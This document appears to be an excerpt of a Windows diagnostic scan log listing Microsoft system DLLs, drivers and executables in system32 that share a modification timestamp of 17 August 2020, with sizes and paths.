2020-08-17 21:32 - 2020-08-17 21:32 - 000259072 _____ (Microsoft Corporation) C:\Windows\system32\VPNv2CSP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000257536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbaudio2.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000256000 _____ (Microsoft Corporation) C:\Windows\system32\UpdateDeploymentProvider.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000255488 _____ (Microsoft Corporation) C:\Windows\system32\wpnservice.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000255488 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_ManagePhone.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000253952 _____ (Microsoft Corporation) C:\Windows\system32\icm32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000252928 _____ (Microsoft Corporation) C:\Windows\system32\SpatializerApo.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000251392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\winnat.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000250696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tpm.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000248832 _____ (Microsoft Corporation) C:\Windows\system32\PasswordEnrollmentManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000248832 _____ (Microsoft Corporation) C:\Windows\system32\ManageCI.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000245248 _____ (Microsoft Corporation) C:\Windows\system32\wosc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000244736 _____ (Microsoft Corporation) C:\Windows\system32\PhoneCallHistoryApis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000243200 _____ (Microsoft Corporation) C:\Windows\system32\SystemEventsBrokerServer.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000242688 _____ (Microsoft Corporation) C:\Windows\system32\CapabilityAccessManagerClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000241152 _____ (Microsoft Corporation) C:\Windows\system32\policymanagerprecheck.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000240640 _____ (Microsoft Corporation) C:\Windows\system32\SearchFilterHost.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000240640 _____ (Microsoft Corporation) C:\Windows\system32\HttpsDataSource.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000239928 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.Workplace.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000238592 _____ (Microsoft Corporation) C:\Windows\system32\ApproveChildRequest.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000237880 _____ C:\Windows\system32\containerdevicemanagement.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000237056 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.CapturePicker.Desktop.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000237056 _____ (Microsoft Corporation) C:\Windows\system32\psmsrv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000237056 _____ (Microsoft Corporation) C:\Windows\system32\accessibilitycpl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000236032 _____ (Microsoft Corporation) C:\Windows\system32\tetheringservice.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000235008 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Devices.Sensors.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000235008 _____ (Microsoft Corporation) C:\Windows\system32\fwpolicyiomgr.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000234984 _____ (Microsoft Corporation) C:\Windows\system32\EditionUpgradeManagerObj.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000233472 _____ (Microsoft Corporation) C:\Windows\system32\KnobsCore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000232960 _____ (Microsoft Corporation) C:\Windows\system32\provisioningcsp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\TetheringMgr.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\InstallServiceTasks.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000231936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BthA2dp.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000231912 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\psr.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000228864 _____ (Microsoft Corporation) C:\Windows\system32\MicrosoftAccountTokenProvider.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000227328 _____ (Microsoft Corporation) C:\Windows\system32\schtasks.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000225792 _____ (Microsoft Corporation) C:\Windows\system32\TabSvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000225080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wof.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000224056 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000223744 _____ (Microsoft Corporation) C:\Windows\system32\bthserv.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000222520 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ataport.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000222208 _____ (Microsoft Corporation) C:\Windows\system32\DataExchange.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000221696 _____ (Microsoft Corporation) C:\Windows\system32\dxgiadaptercache.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000220672 _____ (Microsoft Corporation) C:\Windows\system32\MtcModel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000220160 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Radios.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000217600 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Core.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000215552 _____ (Microsoft Corporation) C:\Windows\system32\UserDeviceRegistration.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000215040 _____ (Microsoft Corporation) C:\Windows\system32\PeopleBand.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000214032 _____ (Microsoft Corporation) C:\Windows\system32\ifsutil.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000211968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidclass.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000210944 _____ (Microsoft Corporation) C:\Windows\system32\ErrorDetails.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000209920 _____ (Microsoft Corporation) C:\Windows\system32\wuuhosdeployment.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000209208 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryClient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000208696 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\processr.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000208384 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryUpgrade.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000208384 _____ (Microsoft Corporation) C:\Windows\system32\NPSM.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000208384 _____ (Microsoft Corporation) C:\Windows\system32\AuthBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000206336 _____ (Microsoft Corporation) C:\Windows\system32\useractivitybroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000204800 _____ (Microsoft Corporation) C:\Windows\system32\SwitcherDataModel.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000204800 _____ (Microsoft Corporation) C:\Windows\system32\mssph.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000204608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\spacedump.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000202552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000201744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wcifs.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000201728 _____ (Microsoft Corporation) C:\Windows\system32\AppXApplicabilityBlob.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000201544 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_SIUF.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000201528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdppm.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000200704 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Internal.Input.ExpressiveInput.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000200192 _____ (Microsoft Corporation) C:\Windows\system32\updatepolicy.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000199992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\amdk8.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000199168 _____ (Microsoft Corporation) C:\Windows\system32\Winlangdb.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000198656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBAUDIO.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000197632 _____ (Microsoft Corporation) C:\Windows\system32\Win32CompatibilityAppraiserCSP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000195584 _____ (Microsoft Corporation) C:\Windows\system32\AarSvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000193848 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsd.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000187904 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Haptics.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000187392 _____ (Microsoft Corporation) C:\Windows\system32\tssrvlic.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000186880 _____ (Microsoft Corporation) C:\Windows\system32\fcon.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000186472 _____ (Microsoft Corporation) C:\Windows\system32\BCP47mrm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000183808 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Energy.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000183608 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000182288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msgpioclx.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000182272 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000180536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\wfplwfs.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000180232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pdc.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000180224 _____ (Microsoft Corporation) C:\Windows\system32\dot3mm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000180024 _____ (Microsoft Corporation) C:\Windows\system32\ulib.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000179712 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Storage.Compression.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000179200 _____ (Microsoft Corporation) C:\Windows\system32\AppExtension.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000178688 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Graphics.Display.DisplayEnhancementManagement.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000178688 _____ (Microsoft Corporation) C:\Windows\system32\appsruprov.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000177152 _____ (Microsoft Corporation) C:\Windows\system32\EditionUpgradeHelper.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000175616 _____ (Microsoft Corporation) C:\Windows\system32\dmvdsitf.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000174592 _____ (Microsoft Corporation) C:\Windows\system32\WsmAuto.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000174392 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storahci.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000172032 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.CapturePicker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\SpatialAudioLicenseSrv.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000165376 _____ (Microsoft Corporation) C:\Windows\splwow64.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000164368 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000164352 _____ (Microsoft Corporation) C:\Windows\system32\gamingtcui.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000162384 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000162304 _____ (Microsoft Corporation) C:\Windows\system32\fwbase.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000159232 _____ (Microsoft Corporation) C:\Windows\system32\srpapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000158720 _____ (Microsoft Corporation) C:\Windows\system32\umpo.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000157752 _____ (Microsoft Corporation) C:\Windows\system32\rmclient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000157696 _____ (Microsoft Corporation) C:\Windows\system32\dssvc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000155648 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_AppExecutionAlias.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000155136 _____ (Microsoft Corporation) C:\Windows\system32\mmgaproxystub.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000152416 _____ (Microsoft Corporation) C:\Windows\system32\KerbClientShared.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000151568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vmbus.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000151552 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_BackgroundApps.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000151352 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scmbus.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000151040 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.SerialCommunication.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000151040 _____ (Microsoft Corporation) C:\Windows\system32\VoipRT.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000149504 _____ C:\Windows\system32\DataStoreCacheDumpTool.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000147776 _____ (Microsoft Corporation) C:\Windows\system32\aadWamExtension.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000147456 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000147456 _____ (Microsoft Corporation) C:\Windows\system32\browserexport.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000146712 _____ (Microsoft Corporation) C:\Windows\system32\profext.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000146232 _____ (Microsoft Corporation) C:\Windows\system32\ResourcePolicyServer.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000145920 _____ (Microsoft Corporation) C:\Windows\system32\oleprn.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\GraphicsCapture.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000144384 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentActivation.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000142760 _____ (Microsoft Corporation) C:\Windows\system32\LicensingUI.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000141840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stornvme.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\socialapis.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\provpackageapidll.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000140800 _____ (Microsoft Corporation) C:\Windows\system32\slc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000138752 _____ (Microsoft Corporation) C:\Windows\system32\InputLocaleManager.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000138240 _____ (Microsoft Corporation) C:\Windows\system32\TelephonyInteractiveUser.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000137728 _____ (Microsoft Corporation) C:\Windows\system32\dwmredir.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000136704 _____ (Microsoft Corporation) C:\Windows\system32\Windows.System.Profile.RetailInfo.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000136192 _____ (Microsoft Corporation) C:\Windows\system32\sppc.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000135168 _____ (Microsoft Corporation) C:\Windows\system32\musdialoghandlers.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000132608 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Storage.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000132096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tsusbhub.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000131896 _____ (Microsoft Corporation) C:\Windows\system32\DTUHandler.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000131584 _____ (Microsoft Corporation) C:\Windows\system32\DevicePairingExperienceMEM.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000131072 _____ (Microsoft Corporation) C:\Windows\system32\CredDialogBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000130560 _____ (Microsoft Corporation) C:\Windows\system32\globinputhost.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000130048 _____ (Microsoft Corporation) C:\Windows\system32\CloudDomainJoinAUG.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\vdsutil.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\CameraCaptureUI.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000129024 _____ (Microsoft Corporation) C:\Windows\system32\UtcDecoderHost.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000129024 _____ (Microsoft Corporation) C:\Windows\system32\GameChatTranscription.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\usoapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\mssitlb.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000128512 _____ (Microsoft Corporation) C:\Windows\system32\CaptureService.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000128312 _____ (Microsoft Corporation) C:\Windows\system32\wifitask.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000127488 _____ (Microsoft Corporation) C:\Windows\system32\drvsetup.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000127064 _____ (Microsoft Corporation) C:\Windows\system32\win32u.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000125440 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Credentials.UI.UserConsentVerifier.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000124416 _____ (Microsoft Corporation) C:\Windows\system32\AppxSysprep.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000123904 _____ (Microsoft Corporation) C:\Windows\system32\ApplicationControlCSP.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000121856 _____ (Microsoft Corporation) C:\Windows\system32\updatecsp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000121344 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidbth.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000120320 _____ (Microsoft Corporation) C:\Windows\system32\mapistub.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000120320 _____ (Microsoft Corporation) C:\Windows\system32\mapi32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000120320 _____ (Microsoft Corporation) C:\Windows\system32\KnobsCsp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000120048 _____ (Microsoft Corporation) C:\Windows\system32\OpenWith.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Taskbar.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000118784 _____ (Microsoft Corporation) C:\Windows\system32\Utilman.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000118272 _____ (Microsoft Corporation) C:\Windows\system32\EaseOfAccessDialog.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000117760 _____ (Microsoft Corporation) C:\Windows\system32\PeopleAPIs.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000117264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bindflt.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000116224 _____ (Microsoft Corporation) C:\Windows\system32\MDMAgent.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000114688 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000114688 _____ (Microsoft Corporation) C:\Windows\system32\WaaSAssessment.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000114688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hdaudbus.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000114688 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000110040 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Security.Credentials.UI.CredentialPicker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000109056 _____ (Microsoft Corporation) C:\Windows\system32\vds_ps.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000108032 _____ (Microsoft Corporation) C:\Windows\system32\wwanprotdim.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000108032 _____ (Microsoft Corporation) C:\Windows\system32\TpmTasks.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000107616 _____ (Microsoft Corporation) C:\Windows\system32\phoneactivate.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\Windows.AI.MachineLearning.Preview.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000107520 _____ (Microsoft Corporation) C:\Windows\system32\BcastDVRBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000105984 _____ (Microsoft Corporation) C:\Windows\system32\BthRadioMedia.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000105488 _____ (Microsoft Corporation) C:\Windows\system32\icfupgd.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000104248 _____ (Microsoft Corporation) C:\Windows\system32\Windows.StateRepositoryBroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000103936 _____ (Microsoft Corporation) C:\Windows\system32\dot3msm.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000102912 _____ (Microsoft Corporation) C:\Windows\system32\NFCProvisioningPlugin.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000102216 _____ (Microsoft Corporation) C:\Windows\system32\changepk.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000100864 _____ (Microsoft Corporation) C:\Windows\system32\sethc.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000100864 _____ (Microsoft Corporation) C:\Windows\system32\mssecuser.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000100352 _____ (Microsoft Corporation) C:\Windows\system32\DiagnosticInvoker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000099328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
2020-08-17 21:32 - 2020-08-17 21:32 - 000097792 _____ (Microsoft Corporation) C:\Windows\system32\provdatastore.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000096768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000096768 _____ (Microsoft Corporation) C:\Windows\system32\tzautoupdate.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000096256 _____ (Microsoft Corporation) C:\Windows\system32\atl.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000093696 _____ (Microsoft Corporation) C:\Windows\system32\WSReset.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\wsqmcons.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000092624 _____ (Microsoft Corporation) C:\Windows\system32\taskhostw.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\dot3api.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000091648 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Graphics.Display.DisplayColorManagement.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\ProvPluginEng.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000090112 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Printers.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000089912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000089912 _____ (Microsoft Corporation) C:\Windows\system32\DeviceReactivation.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\WaaSMedicAgent.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\BarcodeProvisioningPlugin.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000088352 _____ (Microsoft Corporation) C:\Windows\system32\remoteaudioendpoint.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000088280 _____ (Microsoft Corporation) C:\Windows\system32\coloradapterclient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000087552 _____ (Microsoft Corporation) C:\Windows\system32\ApiSetHost.AppExecutionAlias.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000087040 _____ (Microsoft Corporation) C:\Windows\system32\EditBufferTestHook.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000086528 _____ (Microsoft Corporation) C:\Windows\system32\mbussdapi.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000086016 _____ (Microsoft Corporation) C:\Windows\system32\AtBroker.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\WSManMigrationPlugin.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000084992 _____ (Microsoft Corporation) C:\Windows\system32\SecurityHealthSystray.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\provtool.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000083456 _____ (Microsoft Corporation) C:\Windows\system32\SystemUWPLauncher.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000083456 _____ (Microsoft Corporation) C:\Windows\system32\clfsw32.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000082432 _____ (Microsoft Corporation) C:\Windows\system32\LocationFrameworkInternalPS.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000079376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\uaspstor.sys
2020-08-17 21:32 - 2020-08-17 21:32 - 000077824 _____ (Microsoft Corporation) C:\Windows\system32\CustomInstallExec.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000076952 _____ (Microsoft Corporation) C:\Windows\system32\CredentialEnrollmentManagerForUser.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\autopilot.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000075264 _____ (Microsoft Corporation) C:\Windows\system32\tetheringclient.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000071680 _____ (Microsoft Corporation) C:\Windows\system32\dwm.exe
2020-08-17 21:32 - 2020-08-17 21:32 - 000071480 _____ (Microsoft Corporation) C:\Windows\system32\win32appinventorycsp.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000071168 _____ (Microsoft Corporation) C:\Windows\system32\ffbroker.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000069704 _____ (Microsoft Corporation) C:\Windows\system32\WindowsManagementServiceWinRt.ProxyStub.dll
2020-08-17 21:32 - 2020-08-17 21:32 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\monitor.sys
